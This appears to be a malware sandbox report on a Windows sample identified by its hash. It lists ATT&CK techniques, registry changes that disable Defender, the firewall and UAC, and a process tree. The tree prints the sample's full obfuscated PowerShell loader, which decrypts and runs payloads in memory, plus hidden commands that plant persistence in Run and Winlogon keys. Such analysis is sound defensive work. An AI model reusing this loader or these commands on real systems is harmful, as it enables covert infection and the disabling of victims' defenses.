d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Modifies firewall policy service 3 TTPs 2 IoCs

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1428	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 40 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1752	powershell.exe
2296	powershell.exe
940	powershell.exe
2444	powershell.exe
408	powershell.exe
2180	powershell.exe
956	powershell.exe
892	powershell.exe
2180	powershell.exe
1640	powershell.exe
1752	powershell.exe
1532	powershell.exe
1736	powershell.exe
2368	powershell.exe
2204	powershell.exe
3060	powershell.exe
1648	powershell.exe
2544	powershell.exe
776	powershell.exe
2184	powershell.exe
1868	powershell.exe
1972	powershell.exe
2220	powershell.exe
968	powershell.exe
2444	powershell.exe
2624	powershell.exe
2196	powershell.exe
1928	powershell.exe
1648	powershell.exe
2868	powershell.exe
1060	powershell.exe
1160	powershell.exe
2948	powershell.exe
2164	powershell.exe
2332	powershell.exe
2384	powershell.exe
1112	powershell.exe
2136	powershell.exe
868	powershell.exe
1880	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2404	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 2 IoCs

pid	Process
2464	z4z25rle.3x1.exe
2572	z4z25rle.3x1.exe

Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

persistence privilege_escalation

Clear Persistence

T1070.009

pid	Process
584	cmd.exe
1152	cmd.exe
2936	cmd.exe
2444	cmd.exe
1296	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1284	sc.exe
336	sc.exe
2272	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 9 IoCs

pid	Process
1380	taskkill.exe
1972	taskkill.exe
3044	taskkill.exe
3032	taskkill.exe
2568	taskkill.exe
2584	taskkill.exe
3040	taskkill.exe
2404	taskkill.exe
2852	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
936	reg.exe
2636	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1016	schtasks.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2948	powershell.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
2444	powershell.exe
2624	powershell.exe
2164	powershell.exe
2196	powershell.exe
1928	powershell.exe
1648	powershell.exe
2948	powershell.exe
2332	powershell.exe
2868	powershell.exe
2384	powershell.exe
1060	powershell.exe
1112	powershell.exe
1160	powershell.exe
2136	powershell.exe
2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
1752	powershell.exe
2204	powershell.exe
1868	powershell.exe
2296	powershell.exe
940	powershell.exe
2444	powershell.exe
2180	powershell.exe
1972	powershell.exe
2220	powershell.exe
408	powershell.exe
968	powershell.exe
1640	powershell.exe
3060	powershell.exe
1648	powershell.exe
2544	powershell.exe
2180	powershell.exe
1752	powershell.exe
956	powershell.exe
892	powershell.exe
776	powershell.exe
1532	powershell.exe
2184	powershell.exe
1736	powershell.exe
2368	powershell.exe
868	powershell.exe
1880	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2568	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	1380	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
Token: SeDebugPrivilege	3040	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	408	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	2852	taskkill.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2088 wrote to memory of 2328	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	30
PID 2088 wrote to memory of 2328	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	30
PID 2088 wrote to memory of 2328	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	30
PID 2088 wrote to memory of 2808	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	31
PID 2088 wrote to memory of 2808	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	31
PID 2088 wrote to memory of 2808	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	31
PID 2088 wrote to memory of 2444	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	32
PID 2088 wrote to memory of 2444	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	32
PID 2088 wrote to memory of 2444	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	32
PID 2328 wrote to memory of 2772	2328	cmd.exe	36
PID 2328 wrote to memory of 2772	2328	cmd.exe	36
PID 2328 wrote to memory of 2772	2328	cmd.exe	36
PID 2328 wrote to memory of 2948	2328	cmd.exe	37
PID 2328 wrote to memory of 2948	2328	cmd.exe	37
PID 2328 wrote to memory of 2948	2328	cmd.exe	37
PID 2328 wrote to memory of 2948	2328	cmd.exe	37
PID 2088 wrote to memory of 2624	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	38
PID 2088 wrote to memory of 2624	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	38
PID 2088 wrote to memory of 2624	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	38
PID 2088 wrote to memory of 2164	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	40
PID 2088 wrote to memory of 2164	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	40
PID 2088 wrote to memory of 2164	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	40
PID 2088 wrote to memory of 2196	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	42
PID 2088 wrote to memory of 2196	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	42
PID 2088 wrote to memory of 2196	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	42
PID 2808 wrote to memory of 2516	2808	cmd.exe	44
PID 2808 wrote to memory of 2516	2808	cmd.exe	44
PID 2808 wrote to memory of 2516	2808	cmd.exe	44
PID 2808 wrote to memory of 1928	2808	cmd.exe	45
PID 2808 wrote to memory of 1928	2808	cmd.exe	45
PID 2808 wrote to memory of 1928	2808	cmd.exe	45
PID 2088 wrote to memory of 1648	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	46
PID 2088 wrote to memory of 1648	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	46
PID 2088 wrote to memory of 1648	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	46
PID 2088 wrote to memory of 2332	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	48
PID 2088 wrote to memory of 2332	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	48
PID 2088 wrote to memory of 2332	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	48
PID 2088 wrote to memory of 2868	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	50
PID 2088 wrote to memory of 2868	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	50
PID 2088 wrote to memory of 2868	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	50
PID 2088 wrote to memory of 2384	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	52
PID 2088 wrote to memory of 2384	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	52
PID 2088 wrote to memory of 2384	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	52
PID 2088 wrote to memory of 1060	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	54
PID 2088 wrote to memory of 1060	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	54
PID 2088 wrote to memory of 1060	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	54
PID 2088 wrote to memory of 1112	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	56
PID 2088 wrote to memory of 1112	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	56
PID 2088 wrote to memory of 1112	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	56
PID 2088 wrote to memory of 1160	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	58
PID 2088 wrote to memory of 1160	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	58
PID 2088 wrote to memory of 1160	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	58
PID 2088 wrote to memory of 2136	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	60
PID 2088 wrote to memory of 2136	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	60
PID 2088 wrote to memory of 2136	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	60
PID 2088 wrote to memory of 1016	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	62
PID 2088 wrote to memory of 1016	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	62
PID 2088 wrote to memory of 1016	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	62
PID 2240 wrote to memory of 2464	2240	taskeng.exe	66
PID 2240 wrote to memory of 2464	2240	taskeng.exe	66
PID 2240 wrote to memory of 2464	2240	taskeng.exe	66
PID 2088 wrote to memory of 2536	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	67
PID 2088 wrote to memory of 2536	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	67
PID 2088 wrote to memory of 2536	2088	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	67

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
"C:\Users\Admin\AppData\Local\Temp\d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\cqxwsvrp.vd1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\5gx0g2hd.t55.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\5gx0g2hd.t55.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2136
- C:\Windows\system32\schtasks.exe
